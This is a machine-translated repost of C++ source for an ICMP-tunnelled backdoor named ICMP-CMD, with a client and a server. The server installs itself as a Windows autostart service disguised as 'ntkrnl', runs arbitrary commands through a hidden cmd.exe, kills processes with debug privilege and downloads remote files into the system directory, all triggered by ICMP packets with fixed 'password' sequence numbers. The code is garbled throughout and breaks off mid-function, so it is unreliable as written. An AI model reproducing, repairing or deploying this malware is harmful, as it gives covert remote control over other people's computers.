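Original source code of an ICMP backdoor program (client and server)

Note: the listing below is a machine-translated copy. Identifiers, string literals and operators are garbled and the server part is cut off at the end, so it does not compile as shown. The traits a defender can still read from it are: commands and their output carried in the payload of ICMP type 0 (echo reply) packets, the fixed sequence numbers 1234 and 4321 used as a "password", and a Windows service named ntkrnl whose binary is copied to ntkrnl.exe in the system directory.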

xiaoxiao2021-03-06  79

//********Client.cpp**********/// #include #include #include pragma comment (lib, "ws2_32.lib) char sendmsg [256]; / * The ip header * / typedef struct iphdr {unsigned int h_len: 4; // 4 top length Unsigned int version: 4; // ip version number, 4 indicate IPv4 unsigned char TOS; // 8 service type TOS unsigned Short total_len; // 16-bit total length (bytes) unsigned short ident; // 16-bit identifier Unsigned short frag_and_flags; // 3 bits of unsigned char TTL; // 8-bit survival time TTL unsigned char proto; // 8 Bit protocol (TCP, UDP, or other) Unsigned short checksum; // 16-bit IP header checksum unsigned int source iP address unsigned int desip; // 32 bit IP address} ipHeader; typedef struct _iHDR {BYTE I_TYPE; // 8-bit type Byte i_code; // 8-bit code ushort i_cksum; // 16-bit check and ushort i_id; // identification number (generally used process number as an identification number) Ushort i_seq; // message SEQ ID ULONG timestamp; // time cut} IcmpHeader; #define STATUS_FAILED 0xFFFF #define MAX_PACKET 2000 char arg [1450]; #define xmalloc (s) HeapAlloc (GetProcessHeap (), HEAP_ZERO_MEMORY, (s)) void fill_icmp_data (char *, int); Ushort Checksum (Ushort *, int); void decode_resp (char *, int, Struct SockAddr_in *); // ICMP Unpacking Function Void Help (Void); Void Usage (CHAR * PROG); INT Main (int Argc, char * argv []) {char * icmp_dest_ip; // target host IP char * Recvbuf; if (argc! = 2) {usage (argv [0]); return 0;} ICMP_DEST_IP = Argv [1]; // Get target host IP WSAData Wsadata; Socket SockRaw; struct sockaddr_in dest, from; int Datasize; INT fromLen = SizeOf (from); char * ICMP_DATA; IF (WSAStartup (MakeWord (2, 2), & WSADATA! = 0) {Printf (stderr, "WSASTARTUP FAILED:% D / N, getLastError ()); EXITPROCESS STATUS_FAILED);} sockRaw = socket (AF_INET, SOCK_RAW, IPPROTO_ICMP); int timeout = 1000; setsockopt (sockRaw, SOL_SOCKET, SO_SNDTIMEO, (char *) & timeout, sizeof (timeout)); timeout = 4000;

setsockopt (sockRaw, SOL_SOCKET, SO_RCVTIMEO, (char *) & timeout, sizeof (timeout)); memset (& dest, 0, sizeof (dest)); dest.sin_addr.s_addr = inet_addr (ICMP_DEST_IP); dest.sin_family = AF_INET; usage (argv [0]); __TRY {for (;;) {RINTF ("ICMP-CMD>); FGETS (SendMSG, 1024, stdin); // Get the command line, save it in the sendMSG array ||! strcmp (sendMSG , "Q / N)) EXITPROCESS (0); f (! Strcmp (Sendmsg," / N)) Continue; ||! strcmp (sendmsg, "h / n)) {help (); continue;} f (! Memcmp (Sendmsg, "http: //, 7))) filename /" / n); Continue; DataSize = Strlen (sendmsg); DataSize = SizeOf (ICMPHEADER); RINTF ("ICMP Packet size is% D, Datasize); icmp_data = (char *) xmalloc (MAX_PACKET); recvbuf = (char *) xmalloc (MAX_PACKET); memset (icmp_data, 0, MAX_PACKET); fill_icmp_data (icmp_data, datasize); ((IcmpHeader *) icmp_data) -> i_cksum = 0 ; ((IcmpHeader *) icmp_data) -> i_cksum = checksum ((USHORT *) icmp_data, datasize); int bwrote = sendto (sockRaw, icmp_data, datasize, 0, (struct sockaddr *) & dest, sizeof (dest)); if (BWrote == Socket_ERROR) {f (wsagetlasterror () == wsaetimedout) Printf ("TIMED O UT / N); Printf (stderr, "sendto failed:% D / N, wsagetlasterror ());} if (BWrote Return 0;} RINTF (" / Nsend packet to% s success! / n, argv [1]) DWORD START = GetTickCount (); for (;;) {IF ((GetTickCount () - start)> = 1000 Break; Memset (Recvbuf, 0, Max_Packet); int bow = recvfrom (sock, recvbuf, max_packet, 0 , (Struct sockaddr *) & from, & fromlen; if (bread == Socket_ERROR) {if (WsagetLastError () == wsaetimedout) {RINTF ("TIMED OUT / N); Break;} Printf (stderr," RECVFROM FAILED:% D / N, wsagetlasterror ()); Break;} Decode_resp (Recvbuf, Bread, & from);

}} // end for} // end try __finally {if (sockRaw = INVALID_SOCKET!) Closesocket (sockRaw); WSACleanup ();} return 0;} USHORT checksum (USHORT * buffer, int size) {unsigned long cksum = 0 WHILE (SIZE> 1) {CKSUM = * buffer ; size- = sizeof (ushort);}} (size) {cksum = * (uchar *) buffer;} cksum = (CKSUM >> 16) (CKSUM & 0xFFFF ); cksum = (cksum >> 16); return (USHORT) (~ cksum);} void fill_icmp_data (char * icmp_data, int datasize) {IcmpHeader * icmp_hdr; char * datapart; icmp_hdr = (IcmpHeader *) icmp_data; icmp_hdr- > i_type = 0; icmp_hdr-> i_code = 0; icmp_hdr-> i_id = (USHORT) GetCurrentProcessId (); icmp_hdr-> timestamp = GetTickCount (); icmp_hdr-> i_seq = 1234; datapart = icmp_data sizeof (IcmpHeader); memcpy (DataPart, Sendmsg, Size);} void usage (char * prog) {printf ("/ t / t ===== Welcome to www.hackerxfiles.net ====== / n); Printf ("/ n); Printf (" / t / t --- [ICMP-CMD V1.0 Beta, By gxisone] --- / n); Printf ("/ T / T --- [e-mail: GXISONE@hotmail.com] --- / n); Printf ("/ t / t --- [2003/8/15] --- / n); P RINTF ("/ t / tusage:% s remoteip / n, prog); Printf (" / t / tctrl c or q /} void decode_resp (char * buf, int bytes, struct sockaddr_in * from) {memset (arg, 0, sizeof (arg)); IpHeader * iphdr; IcmpHeader * icmphdr; unsigned short iphdrlen; iphdr = (IpHeader *) buf; iphdrlen = iphdr-> h_len * 4 icmphdr = (ICMPHEADER *) (BUF iPHDRLEN); if (ICMPHDR-> i_seq == 4321) // The password is correct to output data segment {RINTF ("% D bytes from% s:, bytes, inet_ntoa (from> sin_addr)) ; RINTF ("ICMPTYPE% D, ICMPHDR-> i_TYPE); RINTF ("

ICMPCODE% D, ICMPHDR-> i_code); RINTF ("/ n); Memcpy (Arg, BUF IPHDRLEN 12, 1450); RINTF ("% s, arg);} lse printf ("Other ICMP Packets! / N );} Void help (void) {printf ("/ n); printf (" [http://127.0.0.1/hack.exe -admin.exe

] (Download Files. Parth IS System32) / N); Printf ("List the Process) / N); Printf (" [Pskill ID] / N); Printf ("Command) THE command) / n); Printf ("/ n);} /**************** Server.cpp*********** *** / #include #include #include #include include "stdafx.h pragma comment (lib," Urlmon.lib) pragma comment (lib, "ws2_32.lib) #define ICMP_PASSWORD 1234 #define STATUS_FAILED 0xFFFF #define MAX_PACKET 6500 # Define Xmalloc (s) Heapalloc (GetProcessHeap (), Heap_zero_memory, (s)) / * the ip header * / typedef struct iphdr {unsigned int h_len: 4; // 4 top length Unsigned int version: 4; // ip version No., 4 indicates IPv4 unsigned char TOS; // 8-bit service type TOS unsigned short total_len; // 16-bit total length (byte) unsigned short ident; // 16-bit identifier unsigned short frag_and_flags; // 3 bit flag bit unsigned Char ttl; // 8 Survival Time TTL Unsigned Char Proto; // 8-bit protocol (TCP, UDP, or other) Unsigned short checksum; // 16-bit IP header checksum unsigned int sourceIP; // 32 bitsource IP address Unsigned int desip; // 32 bit ip address} ipHeader; // Defines ICMP header typef struct _ihdr {byte i_type; // 8-bit type BYTE I_CODE; / / 8-bit code ushort i_cksum; // 16-bit check and ushort i_id; // identification number (generally used process number as an identification number) Ushort i_seq; // message serial number Ulong timestamp; // Timestamp} icmpheader; char Arg [256]; char buffer [2048] = {0}; // Pipe output data void decode_resp (char *, int, struct sockaddr_in *); // ICMP unpack function void fill_icmp_data (char * icmp_data); void pslist (void); BOOL killps (DWORD id); // function to kill the process void send (void); char * ICMP_DEST_IP; USHORT checksum (USHORT * buffer, int size); HANDLE hMutex ; SERVICE_STATUS ServiceStatus; SERVICE_STATUS_HANDLE ServiceStatusHandle; void WINAPI ICMP_CmdStart (DWORD, LPTSTR *); void WINAPI CmdControl (DWORD); DWORD WINAPI CmdService (LPVOID); void InstallCmdService (void);

void RemoveCmdService (void); void usage (char * par); int main (int argc, char * argv []) {ERVICE_TABLE_ENTRY DispatchTable [] = {{ "ntkrnl, ICMP_CmdStart}, {NULL, NULL}}; if (argc == 2) {if (! Stricmp (argv [1], "- install) {usage (argv [0]); installcmdservice ();} else if (! Stricmp (argv [1]," - remove)) {usage (argv [0]); RemoveCmdService ();} else usage (argv [0]); return 0;} else usage (argv [0]); StartServiceCtrlDispatcher (DispatchTable); return 0;} void WINAPI ICMP_CmdStart (DWORD dwArgc, LPTSTR * lpArgv) {HANDLE hThread; ServiceStatus.dwServiceType = SERVICE_WIN32; ServiceStatus.dwCurrentState = SERVICE_START_PENDING; ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_PAUSE_CONTINUE; ServiceStatus.dwServiceSpecificExitCode = 0; ServiceStatus.dwWin32ExitCode = 0; ServiceStatus.dwCheckPoint = 0; ServiceStatus. DWWAITHINT = 0; serviceStatusHandle = RegisterServiceCtrlHandler ("NTKRNL, CMDControl); if (ServiceStatusHandle == 0) {OutputDebugstring (" RegisterServiceCtrlHandler Error ! / N); return} ServiceStatus.dwCurrentState = SERVICE_RUNNING; ServiceStatus.dwCheckPoint = 0; ServiceStatus.dwWaitHint = 0; if (SetServiceStatus (ServiceStatusHandle, & ServiceStatus) == 0) {OutputDebugString ( "SetServiceStatus in CmdStart Error / n)!; return} hThread = CreateThread (NULL, 0, CmdService, NULL, 0, NULL); if (hThread == NULL) {OutputDebugString ( "CreateThread in CmdStart Error / n!);} return} void WINAPI CmdControl (DWORD dwCode) { Switch (dwcode) {copy service_control_pause: service: service = service_paused; break; case service_control_continue: servicesTatus.dwcurrentState = service_running;

break; case SERVICE_CONTROL_STOP: WaitForSingleObject (hMutex, INFINITE); ServiceStatus.dwCurrentState = SERVICE_STOPPED; ServiceStatus.dwWin32ExitCode = 0; ServiceStatus.dwCheckPoint = 0; ServiceStatus.dwWaitHint = 0; if (SetServiceStatus (ServiceStatusHandle, & ServiceStatus) == 0) {OutputDebugString (! "SetServiceStatus in CmdControl in Switch Error / n);} ReleaseMutex (hMutex); CloseHandle (hMutex); return case SERVICE_CONTROL_INTERROGATE: break; default: break;} if (SetServiceStatus (ServiceStatusHandle, & ServiceStatus) == 0) {OutputDebugString ( "SetServiceStatus in cmdcontrol out switch error! / N);} returnid lpparam // Here is the main function of the service, write your code here to become a service {char * icmp_data; int bow, datasize, retval; SOCKET sockRaw = (SOCKET) NULL; WSADATA wsaData; struct sockaddr_in dest, from; int fromlen = sizeof (from); int timeout = 2000; char * recvbuf; if ((retval = WSAStartup (MAKEWORD (2,1 ), & wsadata))! = 0) {Printf ("WSASTARTUP FAILED:% S / N, RETVAL); EXITPROCESS STATUS_FAILED);} sockRaw = WSASocket (AF_INET, SOCK_RAW, IPPROTO_ICMP, NULL, 0, WSA_FLAG_OVERLAPPED); if (sockRaw == INVALID_SOCKET) {printf ( "WSASocket () failed:% s / n, WSAGetLastError ()); ExitProcess (STATUS_FAILED );} __Try {bow = setsockopt (SOCKRAW, SOL_SOCKET, SO_RCVTIMEO, (CHAR *) & Timeout, SizeOf (Timeout)); if (Bread == Socket_ERROR) __LEAVE; MEMSET (& DEST, 0, SIZEOF (DEST); DEST. sin_family = AF_INET; datasize = 0; datasize = sizeof (IcmpHeader); icmp_data = (char *) xmalloc (MAX_PACKET); recvbuf = (char *) xmalloc (MAX_PACKET); if (! icmp_data) {/ fprintf (stderr, " Heapalloc Failed% D / N, getLastError ());

__leave;} MEMSET (ICMP_DATA, 0, MAX_PACKET); for (;;) {Int BWrote; BWrote = Sendto (SockRaw, ICMP_DATA, DATASIZE, 0, (Struct Sockaddr *) & Dest, Sizeof (DEST)); Bread = Recvfrom sockRaw, recvbuf, MAX_PACKET, 0, (struct sockaddr *) & from, & fromlen); if (bread == SOCKET_ERROR) {if (WSAGetLastError () == WSAETIMEDOUT) continue; __leave;} decode_resp (recvbuf, bread, & from); Sleep (200); memset (recvbuf, 0, sizeof (recvbuf));}} __finally {if (! sockRaw = INVALID_SOCKET) closesocket (sockRaw); WSACleanup ();} return 0;} void InstallCmdService (void) {SC_HANDLE schSCManager; SC_HANDLE schService; char lpCurrentPath [MAX_PATH]; char lpImagePath [MAX_PATH]; char * lpHostName; WIN32_FIND_DATA FileData; HANDLE hSearch; DWORD dwErrorCode; SERVICE_STATUS InstallServiceStatus; GetSystemDirectory (lpImagePath, MAX_PATH); strcat (lpImagePath, "// ntkrnl.exe); LPHOSTNAME = NULL; Printf ("Transmitting File ...); hSearch = FindfirstFile (LPIMAGEPATH, & FILEDATA); if (hsearch == invalid_handle_value) {GetModuleFileName (Null, L PcurrentPath, MAX_PATH); IF (CopyFile (lpCurrentPath, LPImagePath, false) == 0) {dwerrorcode = getLastError (); if (dwerrorcode == 5) {Printf ("Failure ... Access is denied! / n);} Else {Printf ("Success! / n);}} else};" already exists! / n); findclose (hsearch);} Schscmanager = OpenScManager (LPHOSTNAME , NULL, SC_MANAGER_ALL_ACCESS); if (schSCManager == NULL) {printf ( "Open Service Control Manager Database Failure / n);! return} printf (" Creating Service ....); "ntkrnl, SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS, SERVICE_AUTO_START, Service_ERROR_IGNORE, "

ntkrnl.exe, NULL, NULL, NULL, NULL, NULL); if (schService == NULL) {dwErrorCode = GetLastError (); if (dwErrorCode = ERROR_SERVICE_EXISTS) {printf ( "Failure / n);!! CloseServiceHandle (schSCManager) Return} else {printf ("already exissrs! / N); SCHSERVICE = OpenService (SchscManager," NTKRNL, Service_Start); if (SCHSERVICE == Null) {Printf ("Opening Service .... Failure! / N); CloseServiceHandle; Return}}} else}}} else}}} else {printf ("Success! / N);} Printf (" Starting Service ....); if (STARTSERVICE (Schservice, 0, Null) == 0) {dwerrorcode = getLastError (); if (dwErrorCode == ERROR_SERVICE_ALREADY_RUNNING) {printf ( "already Running / n!); CloseServiceHandle (schSCManager); CloseServiceHandle (schService); return}} else {printf (" Pending ...);} while (QueryServiceStatus ( schService, & InstallServiceStatus) = 0) {if (InstallServiceStatus.dwCurrentState == SERVICE_START_PENDING) {Sleep (100);} else {break;}}! if (InstallServiceStatus.dwCurrentState = SERVICE_RUNNING) {printf ( "Failure / n)!!; Else {Printf ("SUCC ! Ess / n);} CloseServiceHandle (schSCManager); CloseServiceHandle (schService); return} void RemoveCmdService (void) {SC_HANDLE schSCManager; SC_HANDLE schService; char lpImagePath [MAX_PATH]; char * lpHostName; WIN32_FIND_DATA FileData; SERVICE_STATUS RemoveServiceStatus; HANDLE hSearch; DWORD dwErrorCode; GetSystemDirectory (lpImagePath, MAX_PATH); strcat (lpImagePath, "// ntkrnl.exe); lpHostName = NULL; schSCManager = OpenSCManager (lpHostName, NULL, SC_MANAGER_ALL_ACCESS); if (schSCManager == NULL) {printf (" Opening SCM .........); dwerrorcode = getLastError (); if (dwerrorcode! = 5) {Printf ("

Failure! / N);} else {printf ("Failuer ... Access is Denied! / N);} return} SCHSERVICE = OpenService (SchscManager," NTKRNL, Service_all_Access); if (SCHSERVICE == null) {Printf (" Opening service .....); dwerrorcode = getLastError (); if (dwerrorcode == 1060) {Printf ("no exissrs! / N);} else {printf (" failure! / N);} ClosServiceHandle (SchscManager) ;} else {printf ( "Stopping Service ....); if (QueryServiceStatus (schService, & RemoveServiceStatus) = 0!) {if (RemoveServiceStatus.dwCurrentState == SERVICE_STOPPED) {printf (" already Stopped / n!);} else {printf ( "Pending ...); if (ControlService (schService, SERVICE_CONTROL_STOP, & RemoveServiceStatus) = 0!) {while (RemoveServiceStatus.dwCurrentState == SERVICE_STOP_PENDING) {Sleep (10); QueryServiceStatus (schService, & RemoveServiceStatus);} if ( RemoveServiceStatus.dwcurrentState == Service_stopped) {Printf ("Success! / N);} else {printf (" failure! / N);}} else {printf ("failure! / N);}}}} else {printf (" Query failure! / N);} Printf ("Removing Service .... ); IF (SCHSERVICE) == 0) {Printf ("failure! / N);} else {printf (" sucss! / N);}} closeServiceHandle; ClosESERVICEHANDE (SCHSERVICE); Printf ("Removing File .......); SLEEP (1500); hSearch = FindfirstFile (LPIMAGEPATH, & FILEDATA); if (hsearch == invalid_handle_value) {Printf ("no exissrs! / N);} else {ix (deletefile" ) == 0) {Printf ("footure! / N);} else {printf (" success! / N);} findclose (hsearch);} return} void decode_resp (char * buf, int tents, struct sockaddr_in * from ) {IpHeader * iphdr; icmpheader * ICMPHDR;

Unsigned short iphdrlen; iphdr = (ipHeader *) buf; iphdrlen = iphdr-> h_len * 4 icmphdr = (icmpheader *); if (ICMPHDR-> i_seq == ICMP_password) // The password is correct to output data segment {ICMP_DEST_IP = INET_NTOA (from-> sin_addr); // Get the source address of the ICMP package Memcpy (Arg, BUF IPHDRLEN 12, 256); f (! Memcmp (Arg, "Pskill, 6)) {Killps (Atoi (strstr Arg, "))); SIZEOF (" Process is killed!)); send ();} lse if (! Memcmp (Arg, "PSLIST, 6)) {pslist (); send ();} lse if Strcmp (arg, "remove / n)) {transovecmdservice (); sizeof (" service removed!); send (); return;} *********** HTTP download ***** ******** LSE if (! Memcmp (Arg, "http: //, 7)) {if (char * filename = strstr (arg," -)) {char URL [200]; // Save The array of URLs MEMSET (URL, 0, 200); Memcpy (URL, Arg, Int (filename-arg-1); char fname [max_path]; getSystemDirectory; filename ; strcat (fname, "//); STRCAT (FNAME, FILENAME); * strstr (fname, "/ n) = null; hResult hret = urldownloadtofile (0, URL, FNAME, 0); MEMSET (Buffer, 0, Sizeof (buffer); SIZEOF (" Download OK / N)); Else SizeOf ("Download Failure! / N)); send (); Return;} } // *************************************************** ELSE {Security_Attributes sa ; // create cmd command is used to obtain anonymous pipe output HANDLE hRead, hWrite; sa.nLength = sizeof (SECURITY_ATTRIBUTES); sa.lpSecurityDescriptor = NULL; sa.bInheritHandle = TRUE;! if (CreatePipe (& hRead, & hWrite, & sa, 0)) {printf ( "Error On CreatePipe ()); return;} STARTUPINFO si; PROCESS_INFORMATION pi; si.cb = sizeof (STARTUPINFO); GetStartupInfo (& si); si.hStdError = hWrite; si.hStdOutput = hWrite; si . WshowWindow = sw_hide; si.dwflags = startf_useshowWindow | Startf_usestdhandles; char cmdline [270];

GetSystemDirectory (cmdline, max_path 1); trcat (cmdline, "// cmd.exe / c); strcat (cmdline, arg); if (! CreateProcess (Null, Cmdline, Null, NULL, TRUE, NULL, NULL, NULL , & Si, & Pi) {Printf ("Error On CreateProcess ()); Return;} CloseHandle (HWRITE); DWORD BYTESREAD; for (;;) {if (! Readfile (Hread, Buffer, 2048, & BytesRead, null) Break; Sleep (200);} / printf ("% s, buffer); / / / / / /}} / else printf (" Other ICMP Packets! / N); //printf (Endl; Ushort Checksum (ushort * buffer, int size) {unsigned long cksum = 0; while (size> 1) {cksum = * buffer ; size - = sizeof (ushort);} if (size) {cksum = * (uchar * Buffer;} CKSUM = (CKSUM >> 16) (CKSUM & 0xFFFF); CKSUM = (CKSUM >> 16); return (~ cksum);} void Fill_icmp_data (char * icmp_data) {icmpheader * icmp_hdr ; char * datapart; icmp_hdr = (IcmpHeader *) icmp_data; icmp_hdr-> i_type = 0; icmp_hdr-> i_code = 0; icmp_hdr-> i_id = (USHORT) GetCurrentProcessId (); icmp_hdr-> i_cksum = 0; icmp_hdr-> i_seq = 4321; ICMP_HDR-> TimeStamp = Gettickco UND (); // Setting timestamp DataPart = ICMP_DATA SIZEOF (ICMPHEADER); Memcpart, Buffer, Strlen (Buffer); // for (int i = 0; i} void usage (char * par) {printf ("/ t / t ===== Welcome to www.hackerxfiles.net ======= / n); Printf (" / n); printf ("/ t / t --- [ICMP-CMD V1 .0 beta, by gxisone] --- / n); Printf ("/ t / t --- [e-mail: gxisone@hotmail.com] --- / n); printf (" / t / t- - [2003/8/15] --- / N); Printf ("/ n); Printf (" / T / Tusage:% s -install (to install service) / n, par); printf ("/ T / T% s -remove (to remove service) / n, par); printf ("/ n);

return} void send (void) {WSADATA wsaData; SOCKET sockRaw = (SOCKET) NULL; struct sockaddr_in dest; int bread, datasize, retval, bwrote; int timeout = 1000; char * icmp_data; if ((retval = WSAStartup (MAKEWORD ( 2,1), & wsaData)) = 0) ExitProcess (STATUS_FAILED);! if ((sockRaw = WSASocket (AF_INET, SOCK_RAW, IPPROTO_ICMP, NULL, 0, WSA_FLAG_OVERLAPPED)) == INVALID_SOCKET) ExitProcess (STATUS_FAILED); __try {if ( (Bread = setsockopt (SockRaw, SOL_SOCKET, SO_SNDTIMEO, (CHAR *) & TIMEOUT, SIMEOF (TIMEOUT))) == SOCKET_ERROR) __LEVE; / / Settings Send Timeout Memset (& DEST, 0, SIZEOF (DEST)); dest.sin_family = AF_INET; dest.sin_addr.s_addr = inet_addr (ICMP_DEST_IP); datasize = strlen (buffer); datasize = sizeof (IcmpHeader); icmp_data = (char *) xmalloc (MAX_PACKET); if (icmp_data!) __leave; memset (icmp_data, 0 , MAX_PACKET); fill_icmp_data (icmp_data); // filled ICMP packets ((IcmpHeader *) icmp_data) -> i_cksum = checksum ((USHORT *) icmp_data, datasize); // calculate the checksum bwrote = sendto (sockRaw, icmp_data , DataSize, 0, (Struct SockAddr *) & Dest, SizeOf (DEST)); // Send Packet IF (BWrote == SOCKET_ERROR) {/ if (WsagetLastError () == wsaetimedout) Printf ("TIMED OUT / N); / Printf (" Sendto Failed: <__leave;} / printf ("Send Packet TO% s Success! / N << } __finally {if (sockRaw = INVALID_SOCKET!) closesocket (sockRaw); WSACleanup ();} memset (buffer, 0, sizeof (buffer)); Sleep (200);} void pslist (void) {HANDLE hProcessSnap = NULL; PROCESSENTRY32 pe32 = {0}; hProcessSnap = CreateToolhelp32Snapshot (TH32CS_SNAPPROCESS, 0); if (hProcessSnap == (HANDLE) -1) {rintf ( "/ nCreateToolhelp32Snapshot () failed:% d, GetLastError ()); return} pe32.dwSize = SIZEOF (Processentry32);

RINTF ("/ nprocessname processid; if (Process32First (HProcessSnap, & PE32)) {strat [5]; do {strat (buffer, pe32.szexefile); trcat (buffer," / t / t); ITOA (PE32. Th32Processid, A, 10); strcat (buffer, a); trcat (buffer, "/ n); /printf ("/n%-20s%d ,pe32.szexefile ,pe32.th32processid);} while (Process32Next (HProcessSnap , & pe32));} else {rintf ( "/ nProcess32Firstt () failed:% d, GetLastError ());} CloseHandle (hProcessSnap); return;} BOOL SetPrivilege (HANDLE hToken, LPCTSTR lpszPrivilege, BOOL bEnablePrivilege) // tips permissions {TOKEN_PRIVILEGES tp; LUID luid; if {rintf ( "/ nLookupPrivilegevalue error:% d, GetLastError ()) (LookupPrivilegevalue (NULL, lpszPrivilege, & luid)!); return FALSE;} tp.PrivilegeCount = 1; tp.Privileges [0 ] .Luid = luid; if (bEnablePrivilege) tp.Privileges [0] .Attributes = SE_PRIVILEGE_ENABLED; else tp.Privileges [0] .Attributes = 0;. // Enable the privilege or disable all privileges AdjustTokenPrivileges (hToken, FALSE, & tp , Sizeof (token_privileges), (ptoken_privileges) NULL, (PDWORD) NULL); // Call GetLastError to determine whether the function succeeded if (GetLastError () = ERROR_SUCCESS) {rintf ( "AdjustTokenPrivileges failed:% u / n, GetLastError ()); return FALSE;}.! Return TRUE;} BOOL killps (DWORD id) // scrapping process function {HANDLE hProcess = NULL, hProcessToken = NULL; BOOL IsKilled = FALSE, bRet = FALSE; __try {if {rintf ( "/ nOpen (OpenProcessToken (GetCurrentProcess (), TOKEN_ALL_ACCESS, & hProcessToken)!) Current Process Token failed:% d, GetLastError ()); __leave;} / printf ( "/ nOpen Current Process Token ok); if (SetPrivilege (hProcessToken, SE_DEBUG_NAME, TRUE!!)) {__leave;} rintf (" / nSetPrivilege OK!); if ((hprocess =

